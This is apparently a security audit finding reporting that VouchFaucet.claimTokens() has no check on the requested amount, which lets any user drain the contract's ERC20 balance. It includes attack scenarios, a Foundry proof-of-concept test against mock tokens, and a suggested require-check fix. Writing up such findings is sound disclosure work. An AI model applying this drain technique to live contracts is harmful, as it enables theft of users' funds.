Blurry Heather Orca

High

# User without claimable token in VouchFaucet contract can claim

### Summary

The `claimTokens()` function in the VouchFaucet contract is meant to allow users with claimable token amout to claim ERC20 token up to the maximum amount set for that token. However, the function logic also allows for any user user without any claimable token amount to steal funds from the contract using this function. Alternatively, a user that satisfies `require(claimedTokens[token][msg.sender] <= maxClaimable[token], "amount>max");` could claim amounts more than their claimable token amount.

This vulnerability exists due to the require check in 
`require(claimedTokens[token][msg.sender] <= maxClaimable[token], "amount>max");`
Here there is a check for the user's claimable token amount to be less than or equals to the maximum claimable token amount. But there is no check to ensure that the amount parameter does not exceed the user's claimable token amount.

### Root Cause
https://github.com/sherlock-audit/2024-06-union-finance-update-2/blob/main/union-v2-contracts/contracts/peripheral/VouchFaucet.sol#L93-#L97

In `VouchFaucet.sol:L93-L97 `
There is a missing check for amount parameter input to not exceed `claimedTokens[token][msg.sender]`

### Internal pre-conditions

_No response_

### External pre-conditions

_No response_

### Attack Path

**Scenario 1: User with claimable token amount**

1. Assume Alice has claimable amount 1e18 of WETH, `maxClaimable[WETH]` is 1e18 WETH and the VouchFaucet contract holds 100e18 WETH
2. Alice calls the `claimTokens()` with inputs, WETH and 100e18
3. Since `claimedTokens[WETH][Alice]` == 1e18 and is <= 1e18, the require check passes.
4. Alice would receive 100E18 WETH exceeding her claimable amount.


**Scenario 2: User with no claimable token amount**

1. Assume Bob has no claimable amount of WETH, `maxClaimable[WETH]` is 1e18 WETH and the VouchFaucet contract holds 100e18 WETH
2. Bob calls the `claimTokens()` with inputs, WETH and 100e18
3. Since `claimedTokens[WETH][Bob]` == 0 and is <= 1e18, the require check passes.
4. Bob would receive 100E18 WETH without any prior claimable amount.

### Impact

The VoucherFaucet contract token funds can be stolen or drained by any user.

### PoC

Save this contract in the test/foundry/userManager folder and run `forge test --match-contract TestVouchFaucetPoC `

```solidity
pragma solidity ^0.8.0;

import {TestWrapper} from "./TestWrapper.sol";
import {VouchFaucet} from "union-v2-contracts/peripheral/VouchFaucet.sol";

contract TestVouchFaucetPoC is TestWrapper {
    VouchFaucet public vouchFaucet;

    uint256 public TRUST_AMOUNT = 10 * UNIT;

    address public constant BOB = address(0x021);

    function setUp() public {
        deployMocks();
        vouchFaucet = new VouchFaucet(address(userManagerMock), TRUST_AMOUNT);
    }

    function testConfig() public {
        assertEq(vouchFaucet.USER_MANAGER(), address(userManagerMock));
        assertEq(vouchFaucet.TRUST_AMOUNT(), TRUST_AMOUNT);
        assertEq(vouchFaucet.STAKING_TOKEN(), userManagerMock.stakingToken());
    }

    function testanyUserClaim() public {
        uint256 amount = 10 ether;
        erc20Mock.mint(address(vouchFaucet), amount);
        uint256 balBefore = erc20Mock.balanceOf(address(vouchFaucet));
        uint256 BOBbalBefore = erc20Mock.balanceOf(BOB);
        assertEq(BOBbalBefore, 0);
        vm.prank(BOB);
        vouchFaucet.claimTokens(address(erc20Mock), amount);
        uint256 balAfter = erc20Mock.balanceOf(address(vouchFaucet));
        assertEq(balBefore - balAfter, amount);
        assertEq(erc20Mock.balanceOf(BOB), amount);
    }
}
```

### Mitigation

In `VouchFaucet.claimTokens()` , apply a check to ensure the amount param value does not exceed `claimedTokens[token][msg.sender]`
e.g `require(claimedTokens[token][msg.sender] > 0 && amount <= claimedTokens[token][msg.sender], "exceeds claimable amount");`